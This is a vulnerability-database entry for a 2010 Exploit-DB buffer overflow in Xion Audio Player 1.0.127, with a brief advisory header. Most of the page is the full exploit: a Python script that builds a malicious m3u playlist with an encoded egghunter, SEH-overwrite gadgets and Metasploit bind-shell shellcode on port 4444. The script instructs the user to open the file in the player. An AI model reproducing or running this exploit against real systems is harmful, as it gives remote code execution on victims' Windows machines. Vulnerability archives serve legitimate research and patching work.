Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability

vendor:

Xion Audio Player

by:

0v3r

9.8

CVSS

CRITICAL

Buffer Overflow

119

CWE

Product Name: Xion Audio Player

Affected Version From: 1.0.127

Affected Version To: 1.0.127

Patch Exists: NO

Related CWE:

CPE: a:r2_studios:xion_audio_player:1.0.127

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2010

Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability

The Xion Audio Player version 1.0.127 is vulnerable to a buffer overflow vulnerability when parsing m3u files. This vulnerability can be exploited by an attacker to execute arbitrary code on the target system. The exploit code provided in the script triggers the buffer overflow and executes a bind shell payload on port 4444.

Mitigation:

Update to a patched version of Xion Audio Player.

Source

Exploit-DB raw data:

# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Date: 11/23/2010
# Author: 0v3r
# Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe
# Version: 1.0.127
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# encoded with alpha3 encoder by skylined
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"
"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"
"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA")

#win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x37\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x57\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4d\x39\x49\x6c\x33"
"\x5a\x48\x6b\x42\x6d\x38\x68\x5a\x59\x6b\x4f\x49\x6f\x4b\x4f\x63"
"\x50\x6c\x4b\x30\x6c\x64\x64\x64\x64\x6c\x4b\x50\x45\x67\x4c\x4c"
"\x4b\x51\x6c\x37\x75\x61\x68\x76\x61\x58\x6f\x4e\x6b\x52\x6f\x72"
"\x38\x4c\x4b\x73\x6f\x45\x70\x43\x31\x68\x6b\x31\x59\x4c\x4b\x70"
"\x34\x4c\x4b\x57\x71\x7a\x4e\x34\x71\x4f\x30\x6e\x79\x6c\x6c\x6b"
"\x34\x6f\x30\x43\x44\x33\x37\x6b\x71\x69\x5a\x76\x6d\x53\x31\x49"
"\x52\x5a\x4b\x4c\x34\x45\x6b\x52\x74\x41\x34\x54\x68\x50\x75\x38"
"\x65\x6c\x4b\x63\x6f\x54\x64\x53\x31\x38\x6b\x43\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4e\x6b\x53\x6f\x75\x4c\x34\x41\x78\x6b\x64\x43\x64"
"\x6c\x6e\x6b\x4b\x39\x50\x6c\x41\x34\x65\x4c\x52\x41\x7a\x63\x64"
"\x71\x69\x4b\x51\x74\x6e\x6b\x71\x53\x66\x50\x4c\x4b\x77\x30\x74"
"\x4c\x6c\x4b\x74\x30\x45\x4c\x4c\x6d\x6e\x6b\x43\x70\x33\x38\x73"
"\x6e\x53\x58\x4c\x4e\x50\x4e\x64\x4e\x38\x6c\x46\x30\x6b\x4f\x4e"
"\x36\x65\x36\x61\x43\x63\x56\x33\x58\x36\x53\x34\x72\x71\x78\x44"
"\x37\x34\x33\x46\x52\x41\x4f\x42\x74\x6b\x4f\x48\x50\x65\x38\x5a"
"\x6b\x7a\x4d\x39\x6c\x45\x6b\x52\x70\x4b\x4f\x6a\x76\x71\x4f\x4e"
"\x69\x6d\x35\x50\x66\x6d\x51\x7a\x4d\x63\x38\x33\x32\x32\x75\x50"
"\x6a\x43\x32\x79\x6f\x38\x50\x45\x38\x68\x59\x73\x39\x4c\x35\x4e"
"\x4d\x56\x37\x6b\x4f\x6a\x76\x76\x33\x30\x53\x71\x43\x76\x33\x71"
"\x43\x41\x53\x76\x33\x73\x73\x71\x43\x6b\x4f\x4e\x30\x71\x76\x31"
"\x78\x37\x61\x41\x4c\x70\x66\x46\x33\x4b\x39\x48\x61\x6d\x45\x70"
"\x68\x39\x34\x57\x6a\x30\x70\x4b\x77\x72\x77\x6b\x4f\x78\x56\x31"
"\x7a\x46\x70\x61\x41\x63\x65\x6b\x4f\x4e\x30\x35\x38\x6c\x64\x6c"
"\x6d\x36\x4e\x6d\x39\x46\x37\x6b\x4f\x5a\x76\x42\x73\x71\x45\x59"
"\x6f\x68\x50\x75\x38\x6b\x55\x37\x39\x6c\x46\x67\x39\x46\x37\x69"
"\x6f\x4a\x76\x70\x50\x73\x64\x46\x34\x61\x45\x6b\x4f\x78\x50\x6d"
"\x43\x42\x48\x6b\x57\x54\x39\x6b\x76\x50\x79\x50\x57\x6b\x4f\x48"
"\x56\x70\x55\x49\x6f\x6a\x70\x45\x36\x41\x7a\x73\x54\x75\x36\x62"
"\x48\x65\x33\x30\x6d\x6e\x69\x7a\x45\x30\x6a\x52\x70\x63\x69\x75"
"\x79\x48\x4c\x4f\x79\x6d\x37\x71\x7a\x57\x34\x6e\x69\x58\x62\x67"
"\x41\x6b\x70\x69\x63\x6e\x4a\x4b\x4e\x77\x32\x66\x4d\x6b\x4e\x41"
"\x52\x66\x4c\x5a\x33\x6c\x4d\x51\x6a\x66\x58\x6e\x4b\x4c\x6b\x4e"
"\x4b\x42\x48\x70\x72\x69\x6e\x78\x33\x67\x66\x6b\x4f\x70\x75\x67"
"\x34\x4b\x4f\x4e\x36\x33\x6b\x70\x57\x56\x32\x50\x51\x46\x31\x46"
"\x31\x41\x7a\x54\x41\x30\x51\x41\x41\x66\x35\x30\x51\x69\x6f\x4e"
"\x30\x50\x68\x6c\x6d\x5a\x79\x77\x75\x4a\x6e\x52\x73\x39\x6f\x58"
"\x56\x30\x6a\x4b\x4f\x6b\x4f\x50\x37\x59\x6f\x6e\x30\x6c\x4b\x36"
"\x37\x79\x6c\x6d\x53\x78\x44\x31\x74\x4b\x4f\x6b\x66\x30\x52\x69"
"\x6f\x6e\x30\x65\x38\x6a\x50\x6e\x6a\x76\x64\x73\x6f\x63\x63\x49"
"\x6f\x4b\x66\x69\x6f\x4e\x30\x47")

junk  = "A" * 221

nseh  = "\x61" 		            #popad
nseh += "\x6e"		            #nop/align

seh   = "\x7b\x41"                  # POP POP RET

#fix eax to point to the egghunter
prepare  = "\x6e"                   #nop/align
prepare += "\x05\x14\x11"     	    #add eax,0x11001400
prepare += "\x6e"             	    #nop/align
prepare += "\x2d\x13\x11"     	    #sub eax,0x11001300
prepare += "\x6e"             	    #nop/alignn

#jump to eax
jump  = "\x50"		      	    #push eax
jump +="\x6e"		      	    #nop/align
jump += "\xc3"		     	    #retn

#align buffer to hit the egghunter
align = "D" * 112

#few junk before shellcode
preshell = "D" * 500

#the egghunters tag
egg = "w00tw00t"

#few more junk after our shellcode
#I noticed that the bigger the buffer the more reliable the exploit
postshell= "E" * (12000 - len(junk + nseh + seh + preshell + jump + align + egghunter + egg  + preshell + shellcode ))

#the final buffer
buff = junk + nseh + seh + prepare + jump + align + egghunter + preshell + egg + shellcode + postshell

try:
	f = open("exploit.m3u",'w')
	f.write(buff)
	f.close()
	
	print "\n"	
	print "\t-----------------------------------------------------------------"
	print "\t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |"
	print "\t-----------------------------------------------------------------"
	print "\n"
 
	print "\t- File successfully created..."
	print "\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n" 
except:
	print "\t-Oooops! Can't write file ...\n"